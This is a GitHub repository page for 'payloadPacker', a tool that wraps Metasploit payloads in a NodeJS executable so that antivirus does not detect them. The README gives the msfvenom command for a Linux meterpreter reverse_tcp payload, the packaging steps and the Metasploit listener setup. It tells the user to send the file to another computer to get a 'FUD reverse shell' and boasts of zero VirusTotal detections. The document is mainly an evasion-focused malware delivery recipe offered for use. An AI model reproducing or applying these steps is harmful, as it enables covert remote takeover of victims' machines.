Skip to content
This repository has been archived by the owner on Oct 25, 2023. It is now read-only.

yatoub/payloadPacker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

payloadPacker

metasploit payload packer in nodeJS

Description

This tool encapsulate existing metasploit payload in NodeJS instance, the payload is executed by NodeJS so it's not detect by any antivirus.

Installation

We need pkg to package the project

npm install -g pkg

We also need metasploit framework to generate payload

With metasploit, generate your payload and put them in bin directory with payload name. Here is a sample for Linux x86 reverse shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > bin/payload

Utilisation

Package the whole project with pkg

pkg .

Then you have executable files for Windows, Linux and MacOS environnement.

With metasploit set up your listener, with the example

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST IP
set LPORT PORT
exploit

Send this file on another computer and launch it. Now you have a FUD reverse shell.

Tested with Virustotal and 0 detection with the example.